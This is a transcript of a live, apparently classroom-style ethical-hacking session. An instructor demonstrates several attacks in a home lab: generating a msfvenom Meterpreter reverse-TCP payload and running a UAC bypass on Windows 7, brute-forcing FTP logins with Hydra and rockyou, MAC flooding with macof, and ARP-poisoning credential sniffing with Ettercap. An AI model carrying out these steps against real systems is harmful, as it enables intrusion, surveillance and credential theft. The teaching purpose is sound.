So I'll share my. If my screen is visible to everyone.
Yes, I think now it's sharing.
Okay. So now I'm going to hack a system. So I'm just using this Kali index. Now I'm going to create a payload for Windows 7. I'm going to hack a Windows 7 now. So let me see how we are going to hack this by using the.
Of course, there's a break in your voice.
So can you hear?
Yeah, just breaking the voice.
Just a minute, sir. I'll check now. So can you hear me now?
Yes. Perfect. Yeah.
So now I'm going to create a payload to hack a Windows 7 system. Actually, I'm running a Windows 7 system here. So you can see here no that Windows 7 Pro. So I'm going to hack this by using this Kali Linux tool. So now first let me create a payload so that I can get access to this Windows 7. So I'm going to run this sudo su because I'm going to run this in root server. So now I'm going to create a payload by using this Msf Venom. And then I'm going to set a payload. It's -t, and then for Windows, I'm creating this. So Windows for for the language, I'm using this interpreter / and I'm using this reverse TCP. So now I'm going to put this for Windows. Yeah, Windows. Okay, now it's -a, and I don't know whether it's 32-bit or 64-bit. So approximately I'm -f, and then what file is this? Actually, if we see means in mobile means it will be coming, Android means it will be coming as APK, but in Windows it will be coming exe file. So I'm giving it exe. Now I'm going to create a payload. The name of and my name is, if I'll be creating this Akash234.exe. So this is a payload. I'm creating that. So we are having 2-3 methods for this system hacking. So this is the first method. So I'll show how the payload has been created. So now the payload is creating. It's just take a couple of minutes. So once the payload is being created, we have to move on to the next step. This is the first step we'll be using for creating a payload so that we can hack the system. Okay. So there's a simple mistake here, and then the small spelling mistakes. So even a single word miss, so we'll be getting like that. So if you got any error, just please check, because I have missed type in that Windows, it's Windowns. So that is a mistake I've done. So you'll be getting like this. So you can just read this and you can able to understand what the mistake you have done with that. So this is an easy thing. So you can find where is the mistake and then what you have to change. So now the payload is being created. So now I'm going to run a Metasploitable Msf Console. Excuse me. So we're going to run this payload in Metasploit so that we can be able to launch this payload in this Windows 7. Yeah, it's now starting the Metasploit framework console. Yeah. Now I'm going to use exploit this by using this multi-handler option. So multi-handler is the option is nothing but it's a three-way handshake so that we can able to interlink with the target or as victim system. So the multi-handler has been created. So I'm going to set this payload here. So set payload and then forward its Windows. So slash again the metadata. And then it's a reverse TCP. TCP. So the payload Windows and it's been set up properly. So and then you can see here that payload has been set as Windows metadata reverse TCP. It's ready now. So let me check what else I should set for this. So L port has been automatically will be assigned as 4444. But if there is more persons are doing with that, so you have to align a L port to as you have to assign it as a L port whatever you want in a 2222 or a 3333 you can assign that. So now I'm going to set L host now. L host is nothing but listening host and listening port. So it's set L host E0. E0 is nothing but it's my Kali IP address. Now it's been set up. Now I'm not going to enter the L port because it's been defaultly it's been fixed here 4444. So I'm going to do as exploit this. See, started reverse TCP handler on 192.168.1.8 4444 because it's defaultly it's been there. So now I'm going to run another terminal so that I can able to launch my server here. It's service. I'm going to launch a server. Apache. So using this, I can able to access this Apache server. So yeah, I'm going to save my payload. It's sudo cp. It's nothing but copy. So after copying this, 234.exe space slash var slash html. So I'm locating where it should be. So I'm just yeah. Now the payload has been ready. Let me check whether everything's right. So the payload name is Akash234.exe. So in this I've written in a category Akash234.exe. Yeah. Okay. Now let me see. This is the Windows 7. So let I'm going to show now how I'm going to access this. Now I'm just entering this payload 192.234.exe. The payload name. So the created payload has been set here. That's right. Yeah. So 234 it's the payload name. So see, they'll be asking that I'm just giving this run options here. So it's been establishing. So now just think it's some other system else, and then this is another system. So the metadata will be running here. So once the metadata runs, so I'm just giving a run command, or else you can give run, or else you can just give a question mark here, so that you will be getting some sessions here. So now what I'm going to do is I'm just going to do a see. Here is having your some command, right? So I'm going to just screen share it. It's just streaming. See, it's just coming here. What else I have done with this system? Now I'm just entering into Google by using this Windows 7. I'm just typing with bikes, whatever I want. I'm just searching about something. So I'm just thinking about and then this images. So this is a this is a victim system who is searching about the bike. Now I'm an attacker. I can able to see what else is searching here. So we can able to see what the person is doing this. See, he's searching for the bike. So I can able to see that by using this command of screen share. This is the one way that we can able to access this meter. Sometimes this meter is won't work. So what's the reason why the meter won't work means actually I have set on a payload here, right? Yeah. In this place, yeah. Actually, in this place, L port is been aligned as 4444. Sometimes, if more a number of posters are come into a single port, it's the meter won't run. For that, I will tell you what to do now. So, I'm opening a new terminal. The same thing I'm going to do now. I'm going to run this road. Msf space -p space Windows slash meter slash reverse. So once this platform has been created, so now I'm going to do lhost here. Lhost two. So what is my lhost here? 192.168.1.8, and then I'm going to set L port default. It's been L port has been I should set now, so it's 4444, right? I'm going to give as 2222 space platform. -A space to 86. Sorry, I said that it's I don't know whether it's 32-bit or else 64-bit. I'm just going for into approximately into 86. So -f and then exe the file name is -o, and then I'm giving the payload name same 234.exe. So if there is any mistake, we'll be getting an error here. So we can able to get what mistake has been done here, or else the payload is being created with the L post and then L post is actually a okay, see, I have done a mistake here. So L port has been set as 222, but defaultly we have to set again this thing. So we have to just keep it as Control C and MSF Venom. Just change this one. Give it as 22. Yeah, it's been 2222. I'm giving a default. Whatever you want, you can give. It's 1111, or else 2323. Whatever you want, you can give that. So now I'm creating a payload with this. So once the payload has been created and you'll be getting a thing in this thing before thing. So yeah, meter is streaming here. So I'm just giving an enter. So the meter has been stopped. So now what I'm going to do is I'm going. So if I give get system, it won't be get those system because I didn't give any proper thing to the system. So get systems by using that UAC. So UAC is nothing but user account control. So that I'm giving that. So unknown command UAC it's been appear. So I'm going to go it in the background. So that I'm getting a background in session one. So I'm going to search for UAC in background. Yeah. See, I'm getting like this kinds of UAC in in that system. And then let me see whether it's yeah. See here. Actually, the payload has been created. So now the same way you're going to create Msf console here. So the Msf console will be created. The same thing only we are going to do here also. So coming to this, actually what the changes will be here, I will tell you that. Yeah. So actually we have done with that 192.168.1.8, right? So if we come again, we have to set again the here we set LOs, right? So again we have to set those set L port and then 2323. So the L port will be aligned here. Then we have given the exploit, you will be getting those 192.168.1.8 double colon 2323 will be getting like that. Because of if we use means different port means the meter can able to run easily with that. The default is for just a single computer. If you're using in a group, you can use in different ports. So I'm just running with that. So let me check what the bypass I can do now. So use exploit Windows local bypass UAC. Excellent. Yeah. Now I can use this. Yeah, I can use this fourth one. Oh my god. Some technical issues have been happening. Just I will clear this. Now from this, yeah. So MSF technical issues has been occurred here. So let me clear that. Yeah. So where I stop. So okay, MSF6. So I'll come to this. I'll do it this once again. Just note on that, so you can able to easily done. Just I'll clear this and I'll do it from first. It's a simple thing. Just watch on. Now I'm going to MSF Venom. So I'm just setting a payload like this. So MSF Venom is nothing but it's a payload by the Windows and then meter reverse TCP. I'm setting this L host and then L port. But in here, I'm just going to align with 4444 only, so that I'm using a single percentage. So not other persons are using, so that I can just give it as a like this alone. So then the payload will be created here like Akash234.exe. So if I close this one too, so bit has been stopped. So it's been getting a bit time. Okay. Now the payload has been created as Akash1234.exe. It's a empty payload so that we can able to get those access here. So now the thing is, the next thing is what we are going to do is I'm going to run this Msf Console so that the Metasploit framework will be starting working here. So it's starting the Metasploit framework. See, the MSF6 is now ready to. So now I'm going to set this payload by using this multi-handler. I'm going to use exploit slash I'm using this multi slash handler. So the multi-handler has been set. Now I'm going to set this payload here. Set payload Windows slash metapeta slash reverse TCP. So the reverse TCP has been set here. So I'm going to set an LO. So again, I'm saying that E0. So E0 is nothing but my. So I'm just going to do options. So what else I have to do? Okay. Set payload Windows interpreter. Oh my God. Sorry for the inconvenience. I'm just faced. So this will go through. Msf Console. Yeah. So this is- yeah. Now I just getting this computer system. I'm just giving the screen share so that I'll be getting those Windows 7 access here. So that I have inserted a payload in this Windows 7 so that I can able to access the system. So I can able to watch just what they are doing. So if the person is logging into Google or else is doing some other is what else is doing that, I can able to just watch from here because I've just given a command. Just I'm just giving the command as screen share so that I can able to just watch what the victim or as the targeted person is doing there. So now I'm going to just now because in this system hacking we are just having those two types of hacking there. One is just a basic hack. We can able to hack those, and then we can able to get some just screenshots or else screen shares. Now I'm going to just bypass to the computer. So if we are hacking those computer means that just the computer is asking that whether we can accept them or else not. If a person is coming with it by using this privilege escalation, you can able to bypass this and then you can able to get more access here. So just I'm going to done it. Okay. So now I'm going to use this get system here. Actually, it won't be get low systems. So what I'm going to do now is I'm just going to type background so that I can able to get those backgrounds. So session one backgrounding session one. So I can able to search here. So what are the sessions here? So I'm going to search as UAC. There's nothing but I've already set users account control. The victim account control we are going to get. So let me search here. What else has been there? Okay, exploit Windows local bypass UAC. I'm going to use. We need not type those full. Just type. You can able to type U4 so that the session will be running, and then we can go for options. So we'll be getting like this. So starting interaction with one. So I'm going to set session one. So let me give a run command then. Execute it. So actually, the server username is the Windows 7 username is Akash. Actually, I have given it's my Windows 7, so I'm just getting that username. What is that? So now I'm able to access those whatever I want. So now I'm going to just take a screenshot here. So screenshot. So let me see what the screenshot. Yeah, now the screenshot has been saved. Yeah, I'm going to check where the screenshot has been. So I'm going to just open the folder. So I can able to notice that this is a screenshot here. So I can able to get those screenshots here. See, so what the page I am open here. See, if whatever thing we want to do, we can use this, or else if I'm opening this Google, I'm closing, I'm just mimicking this window, and then now I'm opening with the Kali Linux. I'm just taking a screenshot, and then the thing is, see, I'm just getting. You can able to take those screenshots by using this. So this is to get those things. So by this options, you can able to get those access by using this. This is a thing that we can able to set a payload, and then we can able to actually we can use by calling Linux tools only. We can able to create a payload, and then you have to set victim or else uh, PC to your hand. So you can able to insert this payload like this. You can able to insert those payloads like link wise, or else people are saying don't click an unknown link, so that if you're clicking those unknown link, they can able to access anything whatever they want. So if you don't know any link unknown site, just avoid it, or else just delete it. No need of clicking that. So if you are clicking like that, if you are going through in this link, your mobiles or your system will be hacked in this race. So this is system hacking that you can able to get those access by using the system hacking. Whatever the details you want, you can take, and then what are the details you can input, what are the files you want to delete, you can able to the system those by inputting this kind. So this is the thing that system hacking we can able to do. So yeah, able to so
Akash,
so can you
yes, Akash. Okay.
so you can
I think your voice is breaking.
now it's clear. Now it's
No,
facing a that's what now we can able to hear my voice, sir.
yes, Akash.
Yes, sir. If you have any like for system hacking.
I think no, you can proceed.
Yes, sir. Okay, so the next thing what we are going to do is we are going to
Akash, again, there's a problem in your audio. Participants, there's a technical glitch in this slide. Just you can wait for a few moments.
using this Kali Linux. Now I'm going to use some techniques so that I can be able to crack this. So I'm just now opening this Kali Linux, as well as I'm using this Metasploit as a server. I'm just going to crack a Metasploit password now. So let me check how I'm going to crack this. So I'm just opening the Metasploit.
Akash, your screen is not visible. I think I'm not shared your. Yes, yes, yes. Yes. Coming.
Yeah. Now I'm just turning on the Metasploit so that now I'm going to just crack the Metasploitable network here. For this, we need a list of passwords here. Actually, the Kali Linux contains lots and lots of combinations of passwords. So if you're trying it in our mobile phones, if you try it for minimum 5 times, so it will say try again after 5 minutes. So if you manually enter those passwords, there are lots of combinations there. For this, I'm going to use a technique so that the system automatically uses the combinations, and then it will be just combined with that, and then it will just check whether it's a password is matching or not, and it will be cracking the password for us. So for that, let me just turn on the Metasploit. So it's getting turned on. And just I'm going to open the Kali Linux. The Metasploit was ready. Just you and me only just know that what is the password. I'm going to say that it's just MSF admin. So I'm just enter the password is the same thing. I'm entering MSF admin. So you and me only just know that its password is MSF admin. So now just log into this. So I'm just getting those IP address. Okay, fine. So IP address is 192.168.1.254. Okay, fine. So I'm just opening the terminal. Now what I'm going to do is I'm just going to this. I'm going to go for my computer, and then file system. The file system contains lots and lots of word list there. I'm going to use that user, and then I'm going to the file called share. So and after share, I'm just searching this word list. So it's been town. Yeah. So you can able to see the word list here. See, this is the thing you'll be getting, and if I open this, it's take a bit of time because it's have a million of passwords, so that it use these combinations. So if I use this rocky.txt file, it take minimum 30 to 45 minutes. So what I'm going to do now is I'm just opening the mouse pad. I'm just opening the new mouse pad. I'm just typing a list of passwords, like whatever I want. I'm just creating a list of passwords because if I use that list of passwords, it's take minimum 30 to 40 minutes, or else it's maybe 1 or 2, or it's maybe it will be taking. So I'm just doing it user, and then here again. So again I'm typing whatever the passwords I want. For example, I'm just typing like this because the list of passwords already have been default. It's been in rocky.txt. So I'm sf admin. So again, has been creating up to 50 passwords like that. Again, Msf admin. Okay, now I'm going to file, save as. So it's been saved as text.exe. Okay, so it's been saved. So now I'm closing this. I'm just opening this terminal. Then cd as. So you can just see that text.exe. So now I'm going to use with Hydra -t for password. Sorry, -u space, so that I can able to do that text tab, so that I can able to get what I want. Text.exe.text. Okay, space -t space same text for this both combinations, and then now I'm going to enter those IP address. So FTP :/1 and 2.168.1.254. So I think so you can get those examples like this. So I'm going to do now Hydra space -l. Screen user is nothing but now I'm going to do the text chat -p same thing space t chat xp. Okay, now FTP :192.168. Two five four one two. Yeah, it's right. After something that enter. See, you're getting that the data is attacking FTP. So once the attack is completed, you can able to get those passwords. What are the user ID? What are the passwords for this IP address login? So you can get those websites IP address. What are the combinations? Yeah. So I can able to do with this rocky.txt, but it's taken lots and lots of time, more than 1 hour as 2 hours also. So while I'm creating some word list, the minimum of word list, it can able to take just a 1 or 2 minutes time, and then after attacking that, it will showing how many tries it's been done. So and then what are the combination is done, and then what is the password and what is the username, so that we can able to get by using this Hydra option. It is nothing but by brute forcing it, we are getting this Hydra, and the topic name is brute forcing with Hydra. So by using this, we can able to get whatever the passwords we need. So just wait for a couple of minutes. So it will be the password is just attacking, and then it's getting those passwords. See, So 304 tries per minute. Yeah. So 16 is active. So it's take a little bit of time, 5 minutes. After that, we'll be getting those passwords. So in between that, so do you have any doubt you can ask until that? So there will be any conversation like that. So do you have any doubts regarding this, or else if you have any clarifications, you can ask now. Anyone? If anyone have any doubts or any clarification, you can ask here. Also, you can just message me there. Chat in that. So now it's become now the what is the status that you can do? 309 tries per minute, and then now it's 928 tries. For 3 minutes, it's taking 928. For per minute, it's taking 309. So it's taking. For password attacks, we just need a list of passwords. Actually, see here. Actually, I've got the password right. So for this post, for actually I've run this post for this post for the system IP address. I just got the user and user password is as user and user. It's nothing but it's right. It's again it's getting so once it's been getted, we'll be getting like this. Actually, what the password we need, what else? So in this case, I will try one other thing. Yes, sir. Actually, you need these kinds of password list here. So for password cracking, there are lots and lots of passwords. See, the roq.txt, it's have a millions of passwords. So by using this, you can able to crack those passwords. I'm just tell you how to do that. Just I'll do from first. Just go from my computer. Just open file system and go to user, and then there will be an option called share, and open the folder so that there will be a word list for that. In this word list, you are having this rocket.txt. You have millions of processes. If you give exact, so it will be goes on because it's totally millions of processes there. So I'm just giving this open terminal here. So in this word list, I'm just going to type Hydra capital L, sorry, hyphen capital L. So I'm just going to mention here that roq.txt and then hyphen p space again or chap roq.txt and then 192.168.1.254. So before that, I have to take whether it's running in FTP or it's HTTP. So I'm just putting FTP double dot double slash, just giving enter. So it's just starting the attack. it's the basic things. Actually, you have been asked for what are the requirements, basic requirements to do password crack. The basic requirements are just we need a tool, and then we need a we need a word list to crack a password. So there are millions of passwords. Even our system itself having. Can you specify some of the open sources? Yeah, you can able to use by using this Hydra, or else you can use like what else? Yeah, Crack Station is there, Hashcat is there, and then you can use John the Ripper. So these are the tools. In this, I will show you what are the tools here. We can able to crack those. See, we can use this tools. John is there, and then we can use Hashcat is there, and then we can use firm Wi-Fi. Wi-Fi cracker is nothing but we can able to crack those Wi-Fi by using this tool. We can able to crack a Wi-Fi passwords like that, and then crack station is one more thing. So I think crack station is not there. So if the crack station is not here, you can get it in GitHub. So I will show you how to get those tools in the using this GitHub. So it's take a bit more time. After that, you will be getting those passwords. So any other doubts and clarifications do you have by recording this Hydros or password cracking? The basic thing you need for this tool is for whatever the tools you are using, we need a list of passwords to try those combinations, because in most of the companies they're just using as like for example admin user is also admin, password is also admin, or else admin 123, or else password 123, the password name is password is 12345, or else 12346. They are using the simple basic passwords. These simple basic passwords of millions of passwords just the rocket.txt contains. By using that, you can able to crack the process whatever you want, but it's take a bit of time, a bit longer. It may take around 1 or 2 or 3 hours regarding that password strength. It's regards password strength. So this is the thing you can able to crack those passwords by using this Hydra by brute forcing net. Any other doubts do you have? Okay. Okay, to perform this attack. So we talk. So John the Ripper, you can use a dictionary attack. Brute force maybe affect some of the systems. It's regards a system processor. So because in my systems, sometimes it's taking a bit of time, and then sometimes it's becoming an error portion. So this is a safe way that we can do a dictionary attack there. Any other doubts? Commonly, I'm facing the problem with John the Ripper is brute force attack. It's taking a long time for me. But you can try with Hydra because it's a simple way, and then it's a easy way to crack the passwords. Hydra is a simple thing, and then it's also an easy thing. But the main disadvantages in this, it's take a bit of time. So because it tries millions combinations with that, and then you will be getting those passwords. So any other doubts regarding this, so that we can move for next topic. The next topic is a bit of simple topic, so just a magic trick will be doing this. So any doubts? Okay, thank you, ma'am. So thank you, everyone. So now let's move on to the topic called phishing. So phishing is the name of. Let me write and show you what else. What is that? It's not. It's it's a phishing, but it's a name called phishing. Phishing. Yeah. Actually, we have pronounced it as phishing, but it's the meaning for phishing is phishing. Actually, what this tool is do means what while fishing, what we'll do, whatever the fish we need, we won't put this. We won't do fishing for a particular fish we need, or else. The thing we need, what are the fish we can catch, we can able to get this the same thing by using simple tools. They can able to access your webcam, they can able to get your Instagram IDs or else Facebook IDs, Yahoo's, Gmail, whatever they want, they can able to get those. That is called as phishing tools. Before going to see that, we are going to see about what is sniffing. Sniffing is nothing but dog sniffs, right? That is called as sniffing. So in that we have lots and lots of tools. In that we are going to do what is meant by MAC flooding. So how it works. So MAC flooding is nothing but actually everyone have known about that switch and hub. Actually hub is a thing that uh, passes the information to everyone who is connected to this network. But switch is not like that. It's direct a person who wants that information to go, and then it's direct to the destinations. But using this MAC flooding, an attacker can MAC flood those networks and then turn the switch to it will be affecting the device, and then the switch device will be turning into hub, so that everyone will be getting those information, even the attackers. So by like that, how we can able to get those informations? I will just explain it now. So I'll just do it and then say this. So before using the MAC flooding tool, you should install so sudo apt install DSNF. Actually, I have DSNF already. I'm just showing you how to install that. Okay. Now I'm just going to use a one command, just mac off -i 80. And space. Then I'm just giving an enter term. Just running into the root now. So I'm just attacked my router now. So my router device will be turned to switch to hub by attacking this. So if I give this, it's go on attack until unless I stop. If this gets overload, the network's totally down, or else the network turns into hub, so that the attacker can come into your network, and then what else information you are sharing, he can able to get those information by using a man in the middle attack. The next topic that we are going to see about that. So you can use this attack. ETH0 is nothing but the network IP address. So you can able to get those and then attack this by using this. It is nothing but it's just a packet. It's sending through the. It's just doing a markup so that the switch router can convert it into the hub so that the information can be shared to everyone, including the attacker. So in this, any doubt do you have? So unless until I have stopped here, it is just to go on attacking the systems. Sorry, no, the network, so that it can able to convert it to hub, so that I can able to easily catch those informations by joining into the network. So until this, do you have any doubts? So you can able to ask. So this is the Mac of using this Mac of we can able to convert the switch devices to hub device, so that each and everyone can join to the network, and then whomever who is in the network can get those information. What is the information they need? This is the one other way so that they can able to get those information. So until this everyone is clear, so if you have any doubt or clarification, you can clarify it now. Okay. So shall I move on to the next topic? So if anyone is can shall I move on to the next topic? Thank you, ma'am. So and then here you see that blue color lines. This is the thing that your usage and then CPU usages. So by running this, my CPU usage is high, so that my system can also may affect, because this is the old system I'm using for 3 years. For these kinds of attacks and these kinds of tools you are using, you need a specific laptops by which contains 4 or 8 to 16 GB RAMs, so that it can able to bear those kinds of loads. If I'm going on setting means, again my system, even my system gets down. Just giving us control T to stop here. See, once I'm stopped, the thing it gets down, so the usages gets down. So for this load of that to bear this kinds of load, we even need a little bit of more technical laptops like SS, like that kinds of laptops we needed to use these kinds of tool. So I'm just clearing this. So the next thing we are going to see is attack cap. So attack cap is nothing but a man in the middle attack. Actually, there will be a link between the server and the client. People will be logging into the server to use or else to work. So on that time, so how can we get those login passwords? So this is the one of the simple thing we can able to get those passwords. If the people is if the people or the person who's the client, yeah, we can take it as a client. So actually, you can just think this system, not this Kali Linux, this Windows as a client. So, for example, you can take this system as now the system is presenting in between, sorry, in front of you. You can think it as a client. Okay. Now I'm going to just open this Metasploit. I'm just going to run as a server. This Metasploit is going to act as a server. Now, the client and the client wants to connect to the server. So once the server, the client is ready to log in, so on this time, a hacker will be coming in between. So the man in the middle, it's called as a man in the middle attack, so that you can able to get those ID and passwords and the websites what they are logging in. So now the same thing I'm going to do that. For that I have to go through their network. So I'm just think it as I'm in their network. So what is the network here? Yeah, I have connected with this IP. So now I'm inside this companies or else any other network. I'm an attacker. Now I'm coming to the network. So I'm just using this Kali Linux. I'm using a tool. So to this technique is called attack graphical. So I'm just using that. We're going to do ARP poisoning now. So I'm just now going to scan for host. What are the hosts are connected to this network? So once the scans gets done, I'm just opening host list. See, it's 254. It's a server IP address. So I'm just going to take this Windows IP address. I don't know what's the IP address is. I'm going to just check what is my IP address. So it's 1.40. Okay. The client server, the client is 1.40. It's here. Okay. Okay. The client is the client IP address is 192.168.1.40, and then the server IP address is 192.168.254. So just now what I'm going to do is I'm just putting a server as a target one, and then client as a target two. So this to be has been set up. And what I'm going to do is I'm going to do a ARP poisoning so that I can get into that, so I can able to get those what they are logging into this. So once this has been started, okay, now the client is using this window is going to log into some servers. So there will be a like a login passwords or something, right? So as like that, I'm going to log into this 192 this one. So the server has been logged in. So just what I'm going to do is I'm just going to log in as whatever the passwords that the people the client has been working. So once the client is logged into the server, the thing is going to happen. The attackers who come in between this got your ID and passwords. So the username is admin, the password is password. Actually, you have the person is logged into http dot this thing. So the thing is this. So password is like this. The content is like this. And this is the way he can able to get your server when the people or someone who is logging into the server. If your network has been leaked or as the person a hacker coming into the network, the hacker can be able to get those informations, login information like this, so that your system will be getting hacked, or else they'll be using your logins in this same website. They'll be logging your ID and users. They can able to use whatever they want. So this is the thing. I'll be doing in Ettercap by using this Ettercap. We'll be doing a ARP poisoning, ARP poisoning. So until that, should you have any doubt? So everyone understood this about ARP poisoning. So two types of sniffings is there. One is there are lots and lots of tools there, but the basic main thing is we can do ARP poisoning and then max letting. So ARP partitioning is nothing but the man in the middle attack. We can use this. We can do the ARP partitioning by using this actor cap, so that we can able to listen what the two targets are doing, so that we can be a middleman, and then we can able to use this access. And then max threading is nothing but it's a thing that flip the switch to flip the switch so that the switch will be converted to the hub, so that everyone in the network will be getting those informations. And then even though attackers can also get those information like by doing this max threading. So this is the thing. Okay, okay, sir. Thank you, sir. So, sir, we can take a little bit of 15 minutes of break, sir.
Yes, Akash. We will take a break and we will back again on 3:15. Yes.
Yeah, okay, sir. Sure, sir. You can take a look.